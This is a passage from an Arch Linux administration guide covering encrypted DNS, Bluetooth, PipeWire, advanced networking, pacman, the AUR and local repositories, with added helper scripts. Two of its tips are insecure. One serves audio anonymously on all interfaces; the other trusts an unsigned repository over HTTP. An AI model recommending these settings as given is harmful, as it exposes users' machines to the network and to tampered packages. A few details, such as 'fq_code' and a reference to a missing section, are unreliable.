Next, point the classic Unix file /etc/resolv.conf at the stub resolver that systemd-resolved listens on (127.0.0.53):
sudo ln -sf /run/systemd/resolve/stub-resolv.conf /etc/resolv.conf
While systemd-resolved is running, NetworkManager hands it the per-connection DNS servers it learns from DHCP instead of writing resolv.conf itself.
From this point on you can inspect the resolver configuration with:
resolvectl status
To force Cloudflare's resolvers (1.1.1.1) with encryption, edit /etc/systemd/resolved.conf (or a drop-in under /etc/systemd/resolved.conf.d/) and set:
[Resolve]
DNS=1.1.1.1#cloudflare-dns.com 1.0.0.1#cloudflare-dns.com
DNSOverTLS=yes
Domains=~.
Two details matter here. The #hostname suffix lets systemd-resolved validate the resolver's TLS certificate against that name; with a bare IP address the connection is encrypted but the server is not authenticated. Domains=~. routes all queries through these global servers; without it, the DHCP-supplied servers of the active link are still used for ordinary lookups. Restart the service (sudo systemctl restart systemd-resolved) and confirm in resolvectl status that DNS over TLS is shown as enabled and that the global servers are the ones listed.
4.2 The Bluetooth Stack (BlueZ)
Bluetooth on Linux is built on BlueZ, a large project sponsored by companies such as Intel. BlueZ provides the kernel-side protocol stack together with the user-space daemon and tools for talking to wireless devices (Low Energy, A2DP audio, HID peripherals).
4.2.1 Installation and Daemons
sudo pacman -S bluez bluez-utils
The main package contains the daemon, bluetoothd; bluez-utils brings the command-line clients. Enable the daemon at boot:
sudo systemctl enable --now bluetooth.service
4.2.2 Interaction with bluetoothctl
Like nmcli, BlueZ provides an interactive client for pairing devices from the console, essential before a graphical environment exists (or on headless servers).
Run the client:
bluetoothctl
You enter the interactive prompt. The workflow for connecting headphones or a keyboard is:
- Power on the local adapter:
[bluetooth]# power on
- Start discovery:
[bluetooth]# scan on
(You will see a flurry of MAC addresses and names. When your device shows up, note its address, e.g. 00:1D:43:XX:YY:ZZ.)
- Pair:
[bluetooth]# pair 00:1D:43:XX:YY:ZZ
(This runs the pairing handshake and exchanges the link keys. Devices with a display or keypad may ask you to confirm a passkey; confirm it only if the numbers on both sides match, since that comparison is what protects the pairing against a man-in-the-middle.)
- Trust:
[bluetooth]# trust 00:1D:43:XX:YY:ZZ
(Crucial: this lets the device reconnect automatically in the future without asking for authorisation.)
- Connect:
[bluetooth]# connect 00:1D:43:XX:YY:ZZ
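Added example, not from the book: the same sequence as a non-interactive function for a headless machine, using the fact that bluetoothctl accepts a single command as its arguments. The address used is a placeholder and the MAC check is this example's own code. Recent BlueZ releases report a failed pair or connect through the exit status; on older ones, read the printed output as well.

```shell
#!/usr/bin/env bash
# Added example, not from the book: the pair/trust/connect sequence above as a
# non-interactive script for headless machines, using bluetoothctl's ability to
# take a single command on its command line. The address used is a placeholder.
valid_mac() {
    local LC_ALL=C mac="$1" h='[0-9A-Fa-f][0-9A-Fa-f]'
    case "$mac" in
        $h:$h:$h:$h:$h:$h) return 0 ;;
        *) return 1 ;;
    esac
}

bt_pair() {
    local mac="$1" scan_secs="${2:-10}"
    valid_mac "$mac" || { echo "not a MAC address: $mac" >&2; return 1; }
    bluetoothctl power on >/dev/null || return 1
    # The controller only learns about a device while discovery is running;
    # "scan on" blocks in non-interactive mode, so give it a fixed window.
    timeout "$scan_secs" bluetoothctl scan on >/dev/null || true
    bluetoothctl pair "$mac"    || return 1   # key exchange; confirm the passkey if one is shown
    bluetoothctl trust "$mac"   || return 1   # allow unattended reconnects
    bluetoothctl connect "$mac"
}

# bt_pair 00:1D:43:AA:BB:CC 15
```

The scan window has to be long enough for the device to advertise; fifteen seconds is usually plenty for headphones put into pairing mode just before the call.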
If at some point Bluetooth audio fails mysteriously or stutters, administrators use the built-in Bluetooth monitor to inspect the raw HCI (Host Controller Interface) traffic:
sudo btmon
4.3 Audio Architecture: The PipeWire Revolution
For the past decade, audio on Linux has been a source of memes and frustration. Three parallel subsystems often clashed with each other:
- ALSA (Advanced Linux Sound Architecture): the lowest layer, inside the kernel; it drives the sound card hardware. (Problem: without a mixer on top, only one application could open the device at a time.)
- PulseAudio: a sound server on top of ALSA. It mixed streams so you could listen to YouTube and Spotify at once. (Problem: its latency was unacceptable for music production.)
- JACK: designed for strict low latency and advanced routing in music production. (Problem: unusable for the average desktop; ordinary applications such as browsers could not talk to it.)
The solution: PipeWire. Started by Wim Taymans at Red Hat, PipeWire is a next-generation media server. It replaces PulseAudio and JACK, combining the ease of use of the former with the low latency of the latter, and it also routes video streams (essential for screen sharing on modern Wayland desktops).
4.3.1 Installing PipeWire and Its Compatibility Layers
In Arch Linux we install the main server plus the compatibility layers that let older programs believe they are talking to PulseAudio or JACK:
sudo pacman -S pipewire pipewire-alsa pipewire-pulse pipewire-jack
(If pacman asks whether to remove pulseaudio because of a conflict, answer yes; that is intentional.)
4.3.2 WirePlumber: The Audio Brain
PipeWire is just the "pipes" through which media flows. For the pipes to know where to go (for example "when Bluetooth headphones connect, route the audio to them"), we need a session manager. The de facto standard, maintained by Collabora, is wireplumber:
sudo pacman -S wireplumber
4.3.3 Activation and the User Space (systemd --user)
Unlike networking or Bluetooth, which are system daemons running as root, modern Linux handles audio and video in user space. This is a sensible security boundary: a global daemon with access to the microphone would run outside the user's session and its permission model.
PipeWire services are therefore enabled with systemd's --user flag. ATTENTION: do not use sudo for the following commands; run them logged in as your regular user (a user session must exist, so this is done after the first login, not inside the chroot):
systemctl --user enable --now pipewire.service
systemctl --user enable --now pipewire-pulse.service
systemctl --user enable --now wireplumber.service
To verify that the architecture is in place and that the compatibility layers work, ask the "PulseAudio" server for its info; if PipeWire is answering, you will see its name:
pactl info
Look for the "Server Name" line. It should read PulseAudio (on PipeWire ...) followed by the version. Magic!
4.3.4 Control and Diagnosis with wpctl
wireplumber includes a powerful command-line tool for manipulating audio nodes, volume and default devices: wpctl (WirePlumber Control).
To list all sinks (speakers/outputs) and sources (microphones/inputs) the system has detected:
wpctl status
The output shows numeric identifiers. The device marked with an asterisk (*) is the current default node.
To change the volume from a bash script or a window-manager keybinding, use the relative syntax. To raise the default sink by 5%:
wpctl set-volume @DEFAULT_AUDIO_SINK@ 5%+
Lower it by 5%:
wpctl set-volume @DEFAULT_AUDIO_SINK@ 5%-
Toggle mute on the default microphone (useful for a dedicated mute key):
wpctl set-mute @DEFAULT_AUDIO_SOURCE@ toggle
With a solid network foundation, encrypted DNS, Bluetooth for peripherals and the most advanced multimedia stack available, your core system is operationally complete. You have turned an inert console into a functional workstation. The next big step in our architectural journey (Chapter 5) is mastering the software life cycle: the art of package management.
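Before moving on, the three wpctl commands above wrapped for a keybinding, as an added example that is not from the book. Two things it adds: a ceiling via wpctl's --limit option, so a held key cannot push the sink past 100% (PipeWire otherwise allows gain above 1.0, which clips), and a parser for the line wpctl get-volume prints ("Volume: 0.45 [MUTED]") so a status bar or notification can show level and mute state. The parser is this example's own code.

```shell
#!/usr/bin/env bash
# Added example, not from the book: a volume helper for window-manager key
# bindings. It uses wpctl's --limit so a held key cannot push the sink above
# 100% (PipeWire otherwise allows gain above 1.0), and it parses the output of
# "wpctl get-volume" so a status bar can show level and mute state.

# Turn the line wpctl prints ("Volume: 0.45 [MUTED]") into "45 muted" / "45 on".
parse_volume() {
    local line="$1" frac pct state=on
    frac=${line#Volume: }
    case "$frac" in *"[MUTED]"*) state=muted ;; esac
    frac=${frac%% *}          # keep only the number
    pct=${frac/./}            # "0.45" -> "045"
    pct=$((10#$pct))          # base 10, so "045" is 45 rather than octal
    echo "$pct $state"
}

volume_up()      { wpctl set-volume -l 1.0 @DEFAULT_AUDIO_SINK@ 5%+; }
volume_down()    { wpctl set-volume @DEFAULT_AUDIO_SINK@ 5%-; }
mic_toggle()     { wpctl set-mute @DEFAULT_AUDIO_SOURCE@ toggle; }
current_volume() { parse_volume "$(wpctl get-volume @DEFAULT_AUDIO_SINK@)"; }

# Typical binding: volume_up followed by current_volume, whose output feeds a notification.
```

The parser assumes the two-decimal format wpctl prints; if a future version changes it, current_volume is the one place to adjust.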
4.4 Advanced Networking: VLANs, Bonding and QoS
Once you master basic connectivity with NetworkManager, the next architectural level, critical on servers and corporate workstations, is manipulating the logical network layers.
4.4.1 VLANs (802.1Q)
Virtual LANs (VLANs) let you split a physical switch (or your network card) into multiple logical subnets that are isolated from each other at layer 2 (one network for security cameras, another for guests, another for administration, say). NetworkManager handles this cleanly.
If your office network delivers traffic tagged with VLAN 10 to your Ethernet port (e.g. enp3s0), you can create a virtual interface on your PC for that tag:
# Create the virtual interface tagged with VLAN 10
nmcli connection add type vlan con-name VLAN10 dev enp3s0 id 10
# Give it a static IP in the right segment
nmcli connection modify VLAN10 ipv4.addresses 10.0.10.5/24 ipv4.method manual
nmcli connection up VLAN10
You now have a virtual interface enp3s0.10 in ip link, which behaves as if it were a separate physical cable. (Isolation between VLANs is enforced by the switch, not by your PC: a host whose port is configured as a trunk can create an interface for any tag it sees, which is why ports for untrusted devices should carry a single untagged VLAN.)
4.4.2 Link Aggregation (Bonding)
What do you do when your motherboard has two Gigabit Ethernet cards and your file server saturates 1 Gbps? You bond them. Network bonding (or teaming) lets you combine bandwidth or provide fault tolerance (unplug one cable and the other keeps the stream alive).
Mode 4 (LACP, Link Aggregation Control Protocol) is the professional choice, provided your switch supports it:
# Create the bond master interface
nmcli connection add type bond con-name MiBond ifname bond0 bond.options "mode=802.3ad,miimon=100"
# Attach the two physical links as ports of the bond
nmcli connection add type ethernet slave-type bond con-name MiBond-Esclavo1 ifname enp3s0 master bond0
nmcli connection add type ethernet slave-type bond con-name MiBond-Esclavo2 ifname enp4s0 master bond0
# Bring the bond up (its ports follow)
nmcli connection up MiBond
(A single TCP flow is still hashed onto one link; aggregation raises the throughput of many flows, not of one. The negotiated LACP state can be read in /proc/net/bonding/bond0.)
4.4.3 Bufferbloat Mitigation (QoS with fq_codel)
"Bufferbloat" occurs when you download a massive file (using 100% of your bandwidth) and your video game's ping spikes from 20ms to 300ms because the game's small packets get stuck behind the download in the modem's buffer. The Linux kernel introduced a mathematical marvel called fq_code (Fair Queuing Controlled Delay) that reorders packets in real time, prioritizing small, fast-moving streams over large downloads.
To activate it, we instruct the kernel to use the default algorithm (sysctl):
sudo nano /etc/sysctl.d/99-network.confWe added:
net.core.default_qdisc=fq_codelAfter restarting (or applying with sudo sysctl --system), you can saturate your network connection with torrents and your ping in League of Legends or Zoom calls will remain identical as if you weren't downloading anything.
4.5 Professional Audio: Mastering PipeWire ↑ Home
PipeWire doesn't just play YouTube audio; it's a Swiss Army knife that blurs the line between end-user audio and professional recording studio routing.
4.5.1 Latency, RTirq and Crackling Mitigation
If you use MIDI synthesizers or DJ software (like Mixxx) and hear crackling/Xruns when playing the piano, it's because PipeWire's buffer size is too small and your CPU doesn't have time to process the sound.
Adjusting the Quantum (Buffer): We can force the runtime latency. The "Quantum" is the number of samples per block. 1024 is safe but has lag; 128 has very low latency but is CPU-intensive. To force an ultra-fast buffer on a sound card running at 48000 Hz:
PIPEWIRE_LATENCY="128/48000" mixxx
To avoid crackling at such low latencies, the PipeWire daemon needs system permission to preempt all other programs (real-time priority). Install rtirq:
sudo pacman -S rtirq
sudo systemctl enable --now rtirq.service
This reorganizes the motherboard's IRQ interrupt priorities, giving your USB/PCIe sound card top hardware priority over your graphics card or hard drives.
4.5.2 Systemic Parametric Equalization (EasyEffects)
Instead of relying on individual program equalizers (Spotify, Firefox), in Arch you can install an interceptor layer that mathematically processes all the operating system's sound using convolution.
sudo pacman -S easyeffects lsp-plugins
EasyEffects uses PipeWire's graph structure to act as a proxy for all audio outputs. You can apply:
- Auto-Gain: Normalizes the volume of YouTube videos, so you'll never be startled by an ad 3 times louder than the video.
- Convolver: You can download impulse response (IR) files recorded in $10,000 acoustic studios, load them here, and make your $30 headphones sound like a professional studio, with measurement-based correction (AutoEQ technology).
- Noise Reduction (RNNoise): An AI filter for your microphone. It intercepts noise from mechanical keys or PC fans, sending a clean announcer voice to Discord/Teams.
4.5.3 Network Audio
Do you have amazing speakers connected to your desktop PC, but you're cooking on the other side of the house with your laptop and want Spotify playing on your desktop? PipeWire includes TCP protocol modules for network routing. No cables required.
On the Server PC (Desktop), you activate the native module:
pactl load-module module-native-protocol-tcp listen=0.0.0.0 auth-anonymous=1
On your laptop (client), you instruct it not to play locally, but to send the raw audio over IP to the server:
PULSE_SERVER=tcp:192.168.1.50 spotify
The audio will be transmitted bit-perfectly and uncompressed over your home Wi-Fi. With this level of modularity, Arch Linux gives you the control of a commercial broadcast network right at your fingertips.
Chapter 5: Package Management, Pacman, and the AUR Revolution ↑ Home
If the kernel is the heart of Arch Linux, the package manager is its circulatory system. Unlike Windows, where you browse the web to download .exe installers of dubious origin, in Linux you rely on centralized, cryptographically signed repositories. Arch Linux shines exceptionally in this regard thanks to two legendary components: Pacman (the official manager) and the AUR (Arch User Repository, the world's largest community-driven software library).
In this chapter, we will learn to master these tools not as simple users who copy and paste commands, but as system administrators who understand how software is packaged, compiled, and deployed.
5.1 Pacman Anatomy and Architecture ↑ Home
pacman is a package manager written in C. Unlike the old apt (Ubuntu/Debian), which is a front end over dpkg, pacman handles both dependency resolution against remote servers and the installation of local files.
5.1.1 The Package Format (.pkg.tar.zst)
In Arch Linux, a compiled (binary) software package isn't black magic. It's simply a compressed archive using the highly advanced zstd algorithm (Zstandard, created by Facebook for maximum decompression speed). If you download a package like firefox-125.0-1-x86_64.pkg.tar.zst and unpack it (using tar -I zstd -xf), you'll see that it contains only two things:
- The actual directory structure (e.g., usr/bin/firefox).
- Metadata files: hidden text files (.PKGINFO, .MTREE, .INSTALL) that pacman reads to find out what version it is, who built it, and what scripts to run when installing or uninstalling it.
When pacman "installs" a package, it literally extracts this folder structure onto the root of your filesystem and records in its database (/var/lib/pacman/local/) which files belong to which program.
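To see the two halves described above in practice, here is an added example (not code from the book): a small Python inspector that splits a package archive into its hidden metadata members and its payload paths and parses .PKGINFO's repeated key = value lines. The package it inspects in the test is constructed in memory; for a real .pkg.tar.zst on disk it shells out to the zstd binary.

```python
import io
import subprocess
import tarfile
from collections import defaultdict

# Hidden metadata members makepkg places at the root of every package archive
METADATA_FILES = {".PKGINFO", ".MTREE", ".INSTALL", ".BUILDINFO", ".CHANGELOG"}


def parse_pkginfo(text: str) -> dict:
    """Parse .PKGINFO: '# comment' lines and 'key = value' lines.
    Keys such as 'depend' repeat, so every key maps to a list of values."""
    info = defaultdict(list)
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        key, sep, value = line.partition("=")
        if sep:
            info[key.strip()].append(value.strip())
    return dict(info)


def inspect_package(tar_bytes: bytes) -> dict:
    """Split an (already decompressed) package archive into metadata and payload."""
    result = {"pkginfo": {}, "metadata": [], "files": []}
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:*") as tar:
        for member in tar.getmembers():
            if member.name in METADATA_FILES:
                result["metadata"].append(member.name)
                if member.name == ".PKGINFO":
                    text = tar.extractfile(member).read().decode("utf-8")
                    result["pkginfo"] = parse_pkginfo(text)
            elif member.isfile():
                # Everything else is the directory tree pacman extracts onto /
                result["files"].append(member.name)
    return result


def inspect_package_file(path: str) -> dict:
    """Inspect a real .pkg.tar.zst on disk; the zstd(1) CLI does the decompression."""
    if path.endswith(".zst"):
        raw = subprocess.run(["zstd", "-dc", path], check=True,
                             capture_output=True).stdout
    else:
        with open(path, "rb") as fh:
            raw = fh.read()
    return inspect_package(raw)


def build_sample_package() -> bytes:
    """Constructed sample package (not a real Arch package) so the example runs offline."""
    pkginfo = (
        "# Generated by makepkg (constructed sample)\n"
        "pkgname = mi-software\n"
        "pkgver = 1.0-1\n"
        "arch = x86_64\n"
        "packager = Example Packager <packager@example.invalid>\n"
        "depend = glibc\n"
        "depend = zlib\n"
    )
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        def add(name: str, data: bytes) -> None:
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
        add(".PKGINFO", pkginfo.encode("utf-8"))
        add(".MTREE", b"#mtree\n")
        add("usr/bin/mi-software", b"#!/bin/sh\necho mi-software\n")
    return buf.getvalue()


if __name__ == "__main__":
    pkg = inspect_package(build_sample_package())
    print("metadata:", pkg["metadata"])
    print("payload :", pkg["files"])
    print("depends :", pkg["pkginfo"].get("depend", []))
```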
5.1.2 Optimizing pacman.conf
Pacman's behavior is strictly dictated by the file /etc/pacman.conf. Let's configure it like a professional. Open the file:
sudo nano /etc/pacman.conf
Find and modify the following options in the [options] section:
- Parallel Downloads: Uncomment the line
ParallelDownloads = 5
By default, pacman downloads packages one at a time. Enabling this downloads 5 files simultaneously, multiplying update speed by 5 on fiber optic connections.
- Color output: Uncomment
Color
The terminal output will be far more readable.
- Easter egg (Pac-Man): Just below Color, write a new line with the word
ILoveCandy
This transforms the progress bar (normally dashes and #) into a Pac-Man that eats pills (c-o-o-o).
5.1.3 The Multilib Repository
Arch Linux today is a strictly 64-bit (x86_64) distribution; there are no longer base repositories for older 32-bit processors. However, much proprietary software, such as Steam, Wine, and emulated Windows games, is still built for 32-bit. To run it, you must enable the [multilib] repository, which contains libraries (such as lib32-glibc) that allow a 64-bit system to natively execute 32-bit binaries. In the same pacman.conf, scroll to the bottom and uncomment these two lines:
[multilib]
Include = /etc/pacman.d/mirrorlist
Save the file and update the repository database for the changes to take effect:
sudo pacman -Sy
(Note: -Sy alone only refreshes the database of which packages exist on the servers; it does not update your local software.)
5.2 Mastering Pacman Commands (S, Q, R) ↑ Home
Pacman uses main flags in uppercase to define the operation, and subflags in lowercase to refine it.
1. Synchronization Operations (-S):
- sudo pacman -Syu: the Holy Grail of Arch. S (Sync), y (refresh repositories), u (sysupgrade). This command synchronizes the local databases with the servers and immediately updates all installed packages to their latest version. Run it at least weekly. Never run -Sy followed by a loose install without doing -Syu: you could cause a partial-upgrade state that breaks your system.
- sudo pacman -S paquete: installs a new program from the official repositories.
- pacman -Ss palabra: searches the remote repositories for packages matching the keyword.
2. Local Query Operations (-Q):
- pacman -Q: lists all packages installed on your system and their version.
- pacman -Qe: lists only the packages explicitly installed by you (ignoring dependencies that were installed automatically). Useful for backing up your installation.
- pacman -Qo /ruta/al/archivo: see a strange file on your system and don't know which program it came from? This queries the pacman database to tell you which package owns the file.
3. Elimination Operations (-R):
- sudo pacman -R paquete (Danger!): removes the package but leaves every dependency it pulled in, accumulating junk on your disk (orphans).
- sudo pacman -Rs paquete (the correct way): removes the package and recursively removes any of its dependencies that no other program on your system uses.
- sudo pacman -Rns paquete: does the same as -Rs, but also (n, for no-save) deletes the system-wide configuration files (.pacsave) that the program could leave in /etc/.
5.3 The AUR (Arch User Repository) and the Compilation Process (makepkg) ↑ Home
If a piece of software is legally proprietary (e.g., Google Chrome), niche (e.g., a dark theme for a window manager), or very new, it won't be in the official Arch repositories. However, it's 99.9% guaranteed to be in the AUR .
The AUR does not contain software. There are no precompiled binaries. The AUR is a giant collection of recipes, called PKGBUILDs, written by users like you. A PKGBUILD is a Bash script containing the exact instructions: where to download the source code, how to patch it, how to compile it, and how to package it into a .pkg.tar.zst so that pacman can install it.
5.3.1 Manual Compilation: The Arch Way
Every Arch user should manually install an AUR package at least once in their lifetime to understand the mechanics and security risks (if someone puts a malicious command in the PKGBUILD, it will run on your machine).
To compile, you need the development toolset (C/C++ compilers, Make, automake, patch) and Git:
sudo pacman -S base-devel git
Manual example: installing the browser google-chrome (which is closed-source and unofficial).
- Clone the AUR repository:
You must do it as your normal user, NEVER as root.
git clone https://aur.archlinux.org/google-chrome.git
cd google-chrome
- Inspection (mandatory for safety):
Open the PKGBUILD with nano or cat. Read the download URLs (source=()) and make sure they point to dl.google.com and not to some strange unrelated server.
- Build and install (makepkg):
We run the Arch build tool:
makepkg -si
-s (sync dependencies): if the PKGBUILD requires other packages to compile, it calls pacman to install them first.
-i (install): after spending minutes or hours compiling and generating the .pkg.tar.zst, it automatically runs pacman to install the final result.
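The inspection step above can be partly mechanized. The following is an added example (not code from the book and not an official Arch tool): it extracts the source=() array from a PKGBUILD, reports any download host outside an expected set, and flags remote sources whose checksum is SKIP, since those are exactly the entries nothing would catch if the download were swapped. The sample PKGBUILD, the hash placeholders and the allowlist are constructed for the example.

```python
import re
from urllib.parse import urlparse

# Hosts we expect the google-chrome PKGBUILD to download from (assumption for this example)
EXPECTED_HOSTS = {"dl.google.com"}

# Constructed sample PKGBUILD, loosely modelled on google-chrome's; digests are placeholders
SAMPLE_PKGBUILD = """\
pkgname=google-chrome
pkgver=125.0.6422.60
pkgrel=1
source=("https://dl.google.com/linux/chrome/deb/pool/main/g/google-chrome-stable/google-chrome-stable_${pkgver}-1_amd64.deb"
        'eula_text.html'   # local file shipped with the PKGBUILD
        'google-chrome-stable.sh')
sha512sums=('0000placeholder0000'
            '1111placeholder1111'
            '2222placeholder2222')
"""


def parse_bash_array(text: str, name: str) -> list:
    """Return the elements of a bash array `name=( ... )`, which may span lines.
    Elements may be single-quoted, double-quoted or bare; # comments are dropped."""
    match = re.search(rf"^{re.escape(name)}=\((.*?)\)", text, re.S | re.M)
    if not match:
        return []
    body = re.sub(r"#[^\n]*", "", match.group(1))
    found = re.findall(r"'([^']*)'|\"([^\"]*)\"|(\S+)", body)
    return [a or b or c for a, b, c in found if a or b or c]


def source_hosts(pkgbuild: str) -> dict:
    """Map each source=() entry to its download host (None for local files)."""
    hosts = {}
    for entry in parse_bash_array(pkgbuild, "source"):
        url = entry.split("::", 1)[-1]                          # 'localname::url' form
        url = re.sub(r"^(git|hg|svn|bzr|fossil)\+", "", url)    # VCS scheme prefixes
        parsed = urlparse(url)
        hosts[entry] = parsed.hostname if parsed.scheme else None
    return hosts


def unverified_sources(pkgbuild: str) -> list:
    """Remote sources whose digest is SKIP or missing: a swapped download would go unnoticed."""
    sources = parse_bash_array(pkgbuild, "source")
    sums = []
    for array in ("b2sums", "sha512sums", "sha256sums", "sha1sums", "md5sums"):
        sums = parse_bash_array(pkgbuild, array)
        if sums:
            break
    hosts = source_hosts(pkgbuild)
    unverified = []
    for i, entry in enumerate(sources):
        digest = sums[i] if i < len(sums) else "SKIP"   # digests align with sources by position
        if hosts[entry] is not None and digest.upper() == "SKIP":
            unverified.append(entry)
    return unverified


def review_pkgbuild(pkgbuild: str, expected_hosts=EXPECTED_HOSTS) -> list:
    """Findings to read before running makepkg; an empty list means nothing was flagged."""
    findings = []
    for entry, host in source_hosts(pkgbuild).items():
        if host is not None and host not in expected_hosts:
            findings.append(f"unexpected download host {host!r} for {entry}")
    for entry in unverified_sources(pkgbuild):
        findings.append(f"checksum is SKIP for remote source {entry}")
    return findings


def tampered_sample() -> str:
    """Constructed variant: the download is redirected and its digest set to SKIP."""
    return (SAMPLE_PKGBUILD
            .replace("dl.google.com", "mirror.example.invalid")
            .replace("'0000placeholder0000'", "'SKIP'"))


if __name__ == "__main__":
    print("original:", review_pkgbuild(SAMPLE_PKGBUILD) or "nothing flagged")
    print("tampered:", review_pkgbuild(tampered_sample()))
```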
5.4 AUR Automation: The "AUR Helpers" (Yay / Paru) ↑ Home
Performing the manual process of cloning, reading the PKGBUILD, and executing makepkg every time you want to update an AUR package or search for a new one is a nightmare. To solve this, the community created AUR helpers. These programs wrap pacman, adding the ability to automatically search, clone, and update from the AUR.
The two dominant players in the market are Yay (Yet Another Yogurt, written in Go) and Paru (written in Rust, developed by the original creator of Yay). Install whichever you prefer; their commands are identical. We will install yay.
Given that yay is itself an AUR package, paradoxically, the only way to install it for the first time is the manual method.
cd ~
git clone https://aur.archlinux.org/yay.git
cd yay
makepkg -si
5.4.1 Mastering Yay
From now on, yay is your best friend. In fact, you can stop using pacman almost completely, since yay passes all commands for the official repositories straight to pacman and manages the AUR in the background. Don't use sudo with yay; it will ask for your password when it needs to install the package after compiling it.
- Search and install from both worlds (Official + AUR):
yay -S spotify
(Yay will download the PKGBUILD, read it, resolve the dependencies, and install it for you.)
- Update the entire system:
The master Arch maintenance command is now:
yay -Syu
Or, even more minimally, simply type yay and press Enter to perform a full update. Yay first updates the official Arch packages, then checks for updates to programs compiled from the AUR.
5.4.2 Cleaning and Maintenance of the Cache (Paccache)
Arch Linux never deletes a downloaded package from the cache. Every time you update the kernel, the old .pkg.tar.zst file stays in /var/cache/pacman/pkg/. Over the years, this can take up tens of gigabytes on your SSD, stealing precious space. This cache is useful for downgrading if an update fails, but you don't need to keep the previous 40 versions of Firefox.
Install the contributed utilities package:
sudo pacman -S pacman-contrib
The paccache tool cleans up old packages, keeping by default only the 3 most recent versions of each installed program, giving you a safety net without wasting space:
sudo paccache -r
To automate it and forget about it, enable the included systemd timer (the modern cron, which we will see in detail in Chapter 10):
sudo systemctl enable --now paccache.timer
You've mastered the package system. You understand how pacman manages binaries, and how the AUR expands the available software almost indefinitely through compilation. With these tools, your TTY is ready to evolve; in the next chapter, we'll move on to the visual layer: Desktop Environments and the Graphical Server.
5.5 Local Repositories: Host Your Own AUR ↑ Home
The vast majority of users consume the AUR, but few understand that pacman is designed to be completely decentralized. You don't have to rely on third-party repositories to install packages; if you need to distribute an internal program across your company or server cluster (home lab), you can create your own repository.
5.5.1 Forging the Database with repo-add
Imagine you have compiled the custom kernel linux-tkg or proprietary management software, generating the file mi-software-1.0-1-x86_64.pkg.tar.zst. For pacman to accept it over the network, it must be indexed.
- Create a directory that will act as your server:
mkdir -p /var/www/html/mi_repo
# Copy the binary package to the folder
cp mi-software-1.0-1-x86_64.pkg.tar.zst /var/www/html/mi_repo/
- Generate the pacman database. The repo-add command creates a .db.tar.gz file that pacman reads to understand dependencies:
cd /var/www/html/mi_repo
repo-add mi_repo.db.tar.gz mi-software-1.0-1-x86_64.pkg.tar.zst
- Deploy your repository. You can use Nginx (Chapter 14) or, for a quick LAN, Python's built-in HTTP module:
python -m http.server 8080
5.5.2 Modifying the Clients
Now, on your laptop (or any machine that needs to install the corporate software), edit /etc/pacman.conf and add at the end of the file:
[mi_repo]
SigLevel = Optional TrustAll
Server = http://192.168.1.150:8080
Run sudo pacman -Sy and you'll see it download your database; now you can install mi-software with a simple pacman -S mi-software. This is the secret of Manjaro, EndeavourOS, and BlackArch: they are simply Arch Linux with extra repositories added to pacman.conf.
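The [mi_repo] stanza above turns signature checking off for that repository, which matters once you read section 5.6.2 on how pacman's GPG verification protects downloads. As an added example (not code from the book), this Python audit parses a pacman.conf, resolves the SigLevel each repository actually gets (a repo without its own inherits [options]), and flags the tokens that let unsigned or untrusted packages through, showing the weak stanza beside a hardened one. The sample configurations are constructed.

```python
# Tokens that weaken verification; DatabaseOptional (pacman's default) is deliberately not listed
WEAK_TOKENS = {
    "Never": "signatures are never checked",
    "PackageNever": "package signatures are never checked",
    "Optional": "unsigned packages are accepted",
    "PackageOptional": "unsigned packages are accepted",
    "TrustAll": "any key in the keyring is accepted, even untrusted ones",
    "PackageTrustAll": "any key is accepted for packages",
    "DatabaseTrustAll": "any key is accepted for the database",
}
# Compiled-in default pacman applies when [options] sets no SigLevel at all
PACMAN_DEFAULT_SIGLEVEL = "Required DatabaseOptional"

# Constructed sample: the stanza from the book, with signature checks effectively off
WEAK_CONF = """\
[options]
HoldPkg = pacman glibc
Color
ILoveCandy
ParallelDownloads = 5

[core]
Include = /etc/pacman.d/mirrorlist

[mi_repo]
SigLevel = Optional TrustAll
Server = http://192.168.1.150:8080
"""

# Hardened stanza: requires the database and packages to be signed. On the server that
# means `repo-add --sign --key <KEYID> ...` for the database and `makepkg --sign` for the
# packages; on each client the key is imported with `pacman-key --add` and `--lsign-key`.
HARDENED_CONF = WEAK_CONF.replace("SigLevel = Optional TrustAll", "SigLevel = Required")


def parse_pacman_conf(text: str) -> dict:
    """INI-like parser: {section: {key: [values]}}; bare keys (Color, ILoveCandy) map to []."""
    conf, section = {}, None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            conf.setdefault(section, {})
            continue
        if section is None:
            continue                                  # stray line before the first section
        key, sep, value = line.partition("=")
        values = conf[section].setdefault(key.strip(), [])
        if sep:
            values.append(value.strip())              # repeated keys (Include, Server) accumulate
    return conf


def effective_siglevel(conf: dict, repo: str) -> str:
    """A repo without its own SigLevel inherits [options]; absent there too, pacman's default applies."""
    own = conf.get(repo, {}).get("SigLevel")
    if own:
        return " ".join(own)
    inherited = conf.get("options", {}).get("SigLevel")
    return " ".join(inherited) if inherited else PACMAN_DEFAULT_SIGLEVEL


def audit_siglevels(text: str) -> list:
    """Return (repo, token, reason) for every weakening token in every repository's SigLevel."""
    conf = parse_pacman_conf(text)
    findings = []
    for repo in conf:
        if repo == "options":
            continue
        for token in effective_siglevel(conf, repo).split():
            if token in WEAK_TOKENS:
                findings.append((repo, token, WEAK_TOKENS[token]))
    return findings


if __name__ == "__main__":
    for label, conf_text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label, audit_siglevels(conf_text) or "no findings")
```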
5.6 Surgical Packaging (Chroot with devtools) ↑ Home
When you write a PKGBUILD and run makepkg on your development machine, there's a catastrophic risk, colloquially known as "It works on my machine." If your PKGBUILD compiles correctly, it might be because three months ago you installed a C++ library called boost for another project. Since it's installed on your system, today's build finds it and succeeds. But you forgot to list boost in the dependencies (depends=) of the PKGBUILD. When you upload your package to the AUR, thousands of users will try to compile it and fail with a "library not found" error because they don't have boost installed.
The official Arch team uses devtools to solve this, ensuring the purity of the environment.
5.6.1 Construction in Isolation (extra-x86_64-build)
Instead of compiling in your polluted environment, devtools automatically creates a clean "chroot" with the most basic Arch Linux base (no libraries, no configurations, no themes), puts the PKGBUILD inside, and compiles it. If your script is missing a dependency, it will fail spectacularly, allowing you to catch the error.
- Install the package-maintainer kit:
sudo pacman -S devtools
- Go to your PKGBUILD folder, but DO NOT run makepkg. Instead, launch the container builder:
extra-x86_64-build
